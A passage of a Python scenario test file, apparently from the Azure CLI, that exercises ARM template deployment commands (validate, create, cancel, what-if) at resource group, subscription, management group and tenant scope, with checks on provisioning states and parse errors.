self.cmd('deployment sub validate --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment sub validate --location WestUS --template-file "{tf}" --parameters "{params_uri}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment sub create -n {dn} --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
self.cmd('deployment sub list', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment sub list --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment sub show -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment sub export -n {dn}', checks=[
])
self.cmd('deployment operation sub list -n {dn}', checks=[
self.check('length([])', 5)
])
self.cmd('deployment sub create -n {dn2} --location WestUS --template-file "{tf}" --parameters @"{params}" '
'--parameters storageAccountName="{storage-account-name}" --no-wait')
self.cmd('deployment sub cancel -n {dn2}')
self.cmd('deployment sub show -n {dn2}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
@AllowLargeResponse(4096)
def test_subscription_level_deployment_old_command(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
deployment_name = self.create_random_name('azure-cli-subscription_level_deployment', 60)
self.kwargs.update({
'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
# params-uri below is the raw file url of the subscription_level_parameters.json above
'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
'dn': deployment_name,
'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
'storage-account-name': self.create_random_name('armbuilddemo', 20)
})
self.cmd('deployment validate --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}" ', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment validate --location WestUS --template-file "{tf}" --parameters "{params_uri}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment create -n {dn} --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}" ', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
self.cmd('deployment list --query "[?name == \'{}\']"'.format(deployment_name), checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment list --filter "provisioningState eq \'Succeeded\'" --query "[?name == \'{}\']"'.format(deployment_name), checks=[
self.check('[0].name', '{dn}')
])
self.cmd('deployment show -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment export -n {dn}', checks=[
])
self.cmd('deployment operation list -n {dn}', checks=[
self.check('length([])', 5)
])
self.cmd('deployment create -n {dn2} --location WestUS --template-file "{tf}" --parameters @"{params}" '
'--parameters storageAccountName="{storage-account-name}" --no-wait')
self.cmd('deployment cancel -n {dn2}')
self.cmd('deployment show -n {dn2}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
class DeploymentTestAtResourceGroup(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_group_deployment')
def test_resource_group_deployment(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'tf_multiline': os.path.join(curr_dir, 'simple_deploy_multiline.json').replace('\\', '\\\\'),
'tf_invalid': os.path.join(curr_dir, 'simple_deploy_invalid.json').replace('\\', '\\\\'),
'extra_param_tf': os.path.join(curr_dir, 'simple_extra_param_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
'params_invalid': os.path.join(curr_dir, 'simple_deploy_parameters_invalid.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-resource-group-deployment', 60),
'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
'Japanese-characters-tf': os.path.join(curr_dir, 'Japanese-characters-template.json').replace('\\', '\\\\')
})
self.cmd('deployment group validate --resource-group {rg} --template-file "{tf}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment group validate --resource-group {rg} --template-file "{Japanese-characters-tf}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment group validate --resource-group {rg} --template-file "{tf_multiline}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
with self.assertRaises(CLIError) as err:
self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt true')
self.assertTrue("Deployment template validation failed" in str(err.exception))
with self.assertRaises(CLIError) as err:
self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}"')
self.assertTrue("Missing input parameters" in str(err.exception))
with self.assertRaises(CLIError) as err:
self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt false')
self.assertTrue("Missing input parameters" in str(err.exception))
self.cmd('deployment group create --resource-group {rg} -n {dn} --template-file "{tf}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
self.cmd('deployment group create --resource-group {rg} -n {dn} --template-file "{tf_multiline}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
with self.assertRaises(CLIError) as err:
self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt true')
self.assertTrue("Deployment template validation failed" in str(err.exception))
with self.assertRaises(CLIError) as err:
self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}"')
self.assertTrue("Missing input parameters" in str(err.exception))
with self.assertRaises(CLIError) as err:
self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt false')
self.assertTrue("Missing input parameters" in str(err.exception))
json_invalid_info = "Failed to parse '{}', please check whether it is a valid JSON format"
with self.assertRaises(CLIError) as err:
self.cmd('deployment group validate -g {rg} -f "{tf_invalid}" -p @"{params}"')
self.assertTrue(json_invalid_info.format('{tf_invalid}') == err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('deployment group validate -g {rg} -f "{tf}" -p @"{params_invalid}"')
self.assertTrue(json_invalid_info.format('{params_invalid}') in err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('deployment group create -g {rg} -n {dn} -f "{tf_invalid}" -p @"{params}"')
self.assertTrue(json_invalid_info.format('{tf_invalid}') == err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('deployment group create -g {rg} -n {dn} -f "{tf}" -p @"{params_invalid}"')
self.assertTrue(json_invalid_info.format('{params_invalid}') in err.exception)
self.cmd('deployment group list --resource-group {rg}', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment group list --resource-group {rg} --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment group show --resource-group {rg} -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment group export --resource-group {rg} -n {dn}', checks=[
])
self.cmd('deployment operation group list --resource-group {rg} -n {dn}', checks=[
self.check('length([])', 2)
])
self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{tf}" --parameters @"{params}" --no-wait')
self.cmd('deployment group cancel -n {dn2} -g {rg}')
self.cmd('deployment group wait -n {dn2} -g {rg} --custom "provisioningState==Canceled"')
self.cmd('deployment group show -n {dn2} -g {rg}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
class DeploymentTestAtManagementGroup(ScenarioTest):
def test_management_group_deployment(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'management_group_level_template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'management_group_level_parameters.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-management-group-deployment', 60),
'mg': self.create_random_name('azure-cli-management', 30),
'sub-rg': self.create_random_name('azure-cli-sub-resource-group', 60),
'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
'storage-account-name': self.create_random_name('armbuilddemo', 20)
})
self.cmd('account management-group create --name {mg}', checks=[])
self.cmd('deployment mg validate --management-group-id {mg} --location WestUS --template-file "{tf}" '
'--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
'--parameters storageAccountName="{storage-account-name}"',
checks=[self.check('properties.provisioningState', 'Succeeded'), ])
self.cmd('deployment mg create --management-group-id {mg} --location WestUS -n {dn} --template-file "{tf}" '
'--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
'--parameters storageAccountName="{storage-account-name}"',
checks=[self.check('properties.provisioningState', 'Succeeded'), ])
self.cmd('deployment mg list --management-group-id {mg}', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment mg list --management-group-id {mg} --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment mg show --management-group-id {mg} -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment mg export --management-group-id {mg} -n {dn}', checks=[
])
self.cmd('deployment operation mg list --management-group-id {mg} -n {dn}', checks=[
self.check('length([])', 4)
])
self.cmd('deployment mg create --management-group-id {mg} --location WestUS -n {dn2} --template-file "{tf}" '
'--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
'--parameters storageAccountName="{storage-account-name}" --no-wait')
self.cmd('deployment mg cancel -n {dn2} --management-group-id {mg}')
self.cmd('deployment mg wait -n {dn2} --management-group-id {mg} --custom "provisioningState==Canceled"')
self.cmd('deployment mg show -n {dn2} --management-group-id {mg}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
# clean
self.cmd('account management-group delete -n {mg}')
class DeploymentTestAtTenantScope(ScenarioTest):
def test_tenant_level_deployment(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'tenant_level_template.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-tenant-level-deployment', 60),
'mg': self.create_random_name('azure-cli-management-group', 40),
'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60)
})
self.cmd('account management-group create --name {mg}', checks=[])
self.cmd('deployment tenant validate --location WestUS --template-file "{tf}" --parameters targetMG="{mg}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment tenant create --location WestUS -n {dn} --template-file "{tf}" --parameters targetMG="{mg}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
self.cmd('deployment tenant list', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment tenant list --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment tenant show -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment tenant export -n {dn}', checks=[
])
self.cmd('deployment operation tenant list -n {dn}', checks=[
self.check('length([])', 4)
])
self.cmd('deployment tenant create --location WestUS -n {dn2} --template-file "{tf}" --parameters targetMG="{mg}" --no-wait')
self.cmd('deployment tenant cancel -n {dn2}')
self.cmd('deployment tenant show -n {dn2}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
self.cmd('group delete -n cli_tenant_level_deployment --yes')
self.cmd('account management-group delete -n {mg}')
class DeploymentTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_deployment_lite')
def test_group_deployment_lite(self, resource_group):
# ensures that a template that is missing "parameters" or "resources" still deploys
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-deployment', 30)
})
self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}')
])
@ResourceGroupPreparer(name_prefix='cli_test_deployment')
def test_group_deployment(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'test-template.json').replace('\\', '\\\\'),
'tf_invalid': os.path.join(curr_dir, 'simple_deploy_invalid.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'test-params.json').replace('\\', '\\\\'),
'error_params': os.path.join(curr_dir, 'test-error-params.json').replace('\\', '\\\\'),
'params_invalid': os.path.join(curr_dir, 'simple_deploy_parameters_invalid.json').replace('\\', '\\\\'),
# params-uri below is the raw file url of the test_params.json above
'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/test-params.json',
'of': os.path.join(curr_dir, 'test-object.json').replace('\\', '\\\\'),
'dn': 'azure-cli-deployment',
'dn2': self.create_random_name('azure-cli-resource-group-deployment2', 60)
})
self.kwargs['subnet_id'] = self.cmd('network vnet create -g {rg} -n vnet1 --subnet-name subnet1').get_output_in_json()['newVNet']['subnets'][0]['id']
self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters "{params_uri}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
with self.assertRaises(CLIError):
self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters @"{error_params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"')
self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}')
])
self.cmd('network lb show -g {rg} -n test-lb',
checks=self.check('tags', {'key': 'super=value'}))
self.cmd('group deployment list -g {rg}', checks=[
self.check('[0].name', '{dn}'),
self.check('[0].resourceGroup', '{rg}')
])
self.cmd('group deployment list -g {rg} --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
self.check('[0].resourceGroup', '{rg}')
])
self.cmd('group deployment show -g {rg} -n {dn}', checks=[
self.check('name', '{dn}'),
self.check('resourceGroup', '{rg}')
])
self.cmd('group deployment operation list -g {rg} -n {dn}', checks=[
self.check('length([])', 2),
self.check('[0].resourceGroup', '{rg}')
])
json_invalid_info = "Failed to parse '{}', please check whether it is a valid JSON format"
with self.assertRaises(CLIError) as err:
self.cmd('group deployment validate -g {rg} -f "{tf_invalid}" -p @"{params}"')
self.assertTrue(json_invalid_info.format('{tf_invalid}') == err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('group deployment validate -g {rg} -f "{tf}" -p @"{params_invalid}"')
self.assertTrue(json_invalid_info.format('{params_invalid}') in err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('group deployment create -g {rg} -n {dn} -f "{tf_invalid}" -p @"{params}"')
self.assertTrue(json_invalid_info.format('{tf_invalid}') == err.exception)
with self.assertRaises(CLIError) as err:
self.cmd('group deployment create -g {rg} -n {dn} -f "{tf}" -p @"{params_invalid}"')
self.assertTrue(json_invalid_info.format('{params_invalid}') in err.exception)
self.cmd('group deployment create -g {rg} -n {dn2} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}" --no-wait')
self.cmd('group deployment cancel -n {dn2} -g {rg}')
self.cmd('group deployment show -n {dn2} -g {rg}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
@ResourceGroupPreparer(name_prefix='cli_test_deployment_with_large_params')
@AllowLargeResponse()
def test_group_deployment_with_large_params(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'large_tf': os.path.join(curr_dir, 'test-largesize-template.json').replace('\\', '\\\\'),
'large_params': os.path.join(curr_dir, 'test-largesize-parameters.json').replace('\\', '\\\\'),
'app_name': self.create_random_name('cli', 30)
})
self.cmd('group deployment validate -g {rg} --template-file "{large_tf}" --parameters @"{large_params}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('group deployment validate -g {rg} --template-file "{large_tf}" --parameters "{large_params}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('group deployment create -g {rg} --template-file "{large_tf}" --parameters @"{large_params}" --parameters function-app-name="{app_name}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}')
])
self.cmd('group deployment create -g {rg} --template-file "{large_tf}" --parameters "{large_params}" --parameters function-app-name="{app_name}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}')
])
@ResourceGroupPreparer(name_prefix='cli_test_on_error_deployment_lastsuccessful')
def test_group_on_error_deployment_lastsuccessful(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-deployment', 30),
'onErrorType': 'LastSuccessful',
'sdn': self.create_random_name('azure-cli-deployment', 30)
})
self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.onErrorDeployment', None)
])
self.cmd('group deployment create -g {rg} -n {sdn} --template-file "{tf}" --rollback-on-error', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.onErrorDeployment.deploymentName', '{dn}'),
self.check('properties.onErrorDeployment.type', '{onErrorType}')
])
@ResourceGroupPreparer(name_prefix='cli_test_on_error_deployment_specificdeployment')
def test_group_on_error_deployment_specificdeployment(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-deployment', 30),
'onErrorType': 'SpecificDeployment',
'sdn': self.create_random_name('azure-cli-deployment', 30)
})
self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.onErrorDeployment', None)
])
self.cmd('group deployment create -g {rg} -n {sdn} --template-file "{tf}" --rollback-on-error {dn}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.onErrorDeployment.deploymentName', '{dn}'),
self.check('properties.onErrorDeployment.type', '{onErrorType}')
])
class DeploymentLiveTest(LiveScenarioTest):
@ResourceGroupPreparer()
def test_group_deployment_progress(self, resource_group):
from azure.cli.testsdk.utilities import force_progress_logging
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'test-template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'test-params.json').replace('\\', '\\\\'),
'of': os.path.join(curr_dir, 'test-object.json').replace('\\', '\\\\'),
'dn': 'azure-cli-deployment2'
})
self.kwargs['subnet_id'] = self.cmd('network vnet create -g {rg} -n vnet1 --subnet-name subnet1').get_output_in_json()['newVNet']['subnets'][0]['id']
with force_progress_logging() as test_io:
self.cmd('group deployment create --verbose -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"')
# very the progress
lines = test_io.getvalue().splitlines()
for line in lines:
self.assertTrue(line.split(':')[0] in ['Accepted', 'Succeeded'])
self.assertTrue('Succeeded: {} (Microsoft.Resources/deployments)'.format(self.kwargs['dn']), lines)
class DeploymentNoWaitTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_group_deployment_no_wait')
def test_group_deployment_no_wait(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
'dn': 'azure-cli-deployment'
})
self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --no-wait',
checks=self.is_empty())
self.cmd('group deployment wait -g {rg} -n {dn} --created',
checks=self.is_empty())
self.cmd('group deployment show -g {rg} -n {dn}',
checks=self.check('properties.provisioningState', 'Succeeded'))
class DeploymentThruUriTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_deployment_uri')
def test_group_deployment_thru_uri(self, resource_group):
self.resource_group = resource_group
curr_dir = os.path.dirname(os.path.realpath(__file__))
# same copy of the sample template file under current folder, but it is uri based now
self.kwargs.update({
'tf': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/simple_deploy.json',
'params': os.path.join(curr_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\')
})
self.kwargs['dn'] = self.cmd('group deployment create -g {rg} --template-uri "{tf}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.templateLink.uri', '{tf}'),
]).get_output_in_json()['name']
self.cmd('group deployment show -g {rg} -n {dn}',
checks=self.check('name', '{dn}'))
self.cmd('group deployment delete -g {rg} -n {dn}')
self.cmd('group deployment list -g {rg}',
checks=self.is_empty())
self.kwargs['dn'] = self.cmd('deployment group create -g {rg} --template-uri "{tf}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{rg}'),
self.check('properties.templateLink.uri', '{tf}'),
]).get_output_in_json()['name']
self.cmd('deployment group show -g {rg} -n {dn}',
checks=self.check('name', '{dn}'))
self.cmd('deployment group delete -g {rg} -n {dn}')
self.cmd('deployment group list -g {rg}',
checks=self.is_empty())
class DeploymentWhatIfAtResourceGroupScopeTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if')
def test_resource_group_level_what_if(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'storage_account_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'storage_account_deploy_parameters.json').replace('\\', '\\\\'),
})
deployment_output = self.cmd('deployment group create --resource-group {rg} --template-file "{tf}"').get_output_in_json()
self.kwargs['storage_account_id'] = deployment_output['properties']['outputs']['storageAccountId']['value']
self.cmd('deployment group what-if --resource-group {rg} --template-file "{tf}" --parameters "{params}" --no-pretty-print', checks=[
self.check('status', 'Succeeded'),
self.check("changes[?resourceId == '{storage_account_id}'].changeType | [0]", 'Modify'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].propertyChangeType", 'Modify'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].before", 'Standard_LRS'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].after", 'Standard_GRS')
])
class DeploymentWhatIfAtSubscriptionScopeTest(ScenarioTest):
def test_subscription_level_what_if(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'policy_definition_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'policy_definition_deploy_parameters.json').replace('\\', '\\\\'),
})
deployment_output = self.cmd('deployment sub create --location westus --template-file "{tf}"').get_output_in_json()
self.kwargs['policy_definition_id'] = deployment_output['properties']['outputs']['policyDefinitionId']['value']
self.cmd('deployment sub what-if --location westus --template-file "{tf}" --parameters "{params}" --no-pretty-print', checks=[
self.check('status', 'Succeeded'),
self.check("changes[?resourceId == '{policy_definition_id}'].changeType | [0]", 'Modify'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].propertyChangeType", 'Modify'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].before", 'northeurope'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].after", 'westeurope'),
])
class DeploymentWhatIfAtManagementGroupTest(ScenarioTest):
def test_management_group_level_what_if(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'management_group_level_template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'management_group_level_parameters.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-management-group-deployment', 60),
'mg': self.create_random_name('azure-cli-management', 30),
'sub-rg': self.create_random_name('azure-cli-sub-resource-group', 60),
'storage-account-name': self.create_random_name('armbuilddemo', 20)
})
self.cmd('account management-group create --name {mg}', checks=[])
self.cmd('deployment mg what-if --management-group-id {mg} --location WestUS --template-file "{tf}" --no-pretty-print '
'--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
'--parameters storageAccountName="{storage-account-name}"',
checks=[
self.check('status', 'Succeeded'),
self.check("length(changes)", 4),
self.check("changes[0].changeType", "Create"),
self.check("changes[1].changeType", "Create"),
self.check("changes[2].changeType", "Create"),
self.check("changes[3].changeType", "Create"),
])
class DeploymentWhatIfAtTenantScopeTest(ScenarioTest):
def test_tenant_level_what_if(self):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'tf': os.path.join(curr_dir, 'tenant_level_template.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-tenant-level-deployment', 60),
'mg': self.create_random_name('azure-cli-management-group', 40),
})
self.cmd('account management-group create --name {mg}', checks=[])
self.cmd('deployment tenant what-if --location WestUS --template-file "{tf}" --parameters targetMG="{mg}" --no-pretty-print', checks=[
self.check('status', 'Succeeded'),
self.check("length(changes)", 3),
self.check("changes[0].changeType", "Create"),
self.check("changes[1].changeType", "Create"),
self.check("changes[2].changeType", "Create"),
])
class DeploymentWhatIfTestWithTemplateSpecs(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if_template_specs', location='westus')
def test_resource_group_level_what_if_ts(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-deploy-what-if-rg-deploy', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'resource_group_location': resource_group_location,
'tf': os.path.join(curr_dir, 'storage_account_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'storage_account_deploy_parameters.json').replace('\\', '\\\\'),
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
deployment_output = self.cmd('deployment group create --resource-group {rg} --template-spec "{template_spec_version_id}"').get_output_in_json()
self.kwargs['storage_account_id'] = deployment_output['properties']['outputs']['storageAccountId']['value']
self.cmd('deployment group what-if --resource-group {rg} --template-spec "{template_spec_version_id}" --parameters "{params}" --no-pretty-print', checks=[
self.check('status', 'Succeeded'),
self.check("changes[?resourceId == '{storage_account_id}'].changeType | [0]", 'Modify'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].propertyChangeType", 'Modify'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].before", 'Standard_LRS'),
self.check("changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0].after", 'Standard_GRS')
])
@ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if_template_specs', location='westus')
def test_subscription_level_what_if_ts(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-deploy-what-if-sub-deploy', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'resource_group_location': resource_group_location,
'tf': os.path.join(curr_dir, 'policy_definition_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'policy_definition_deploy_parameters.json').replace('\\', '\\\\'),
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
deployment_output = self.cmd('deployment sub create --location westus --template-spec {template_spec_version_id}').get_output_in_json()
self.kwargs['policy_definition_id'] = deployment_output['properties']['outputs']['policyDefinitionId']['value']
self.cmd('deployment sub what-if --location westus --template-spec {template_spec_version_id} --parameters "{params}" --no-pretty-print', checks=[
self.check('status', 'Succeeded'),
self.check("changes[?resourceId == '{policy_definition_id}'].changeType | [0]", 'Modify'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].propertyChangeType", 'Modify'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].before", 'northeurope'),
self.check("changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0].after", 'westeurope'),
])
class DeploymentScriptsTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
def test_list_all_deployment_scripts(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'deployment_script_name': self.create_random_name('script', 20),
'deployment_name': self.create_random_name('ds', 20),
'resource_group': resource_group,
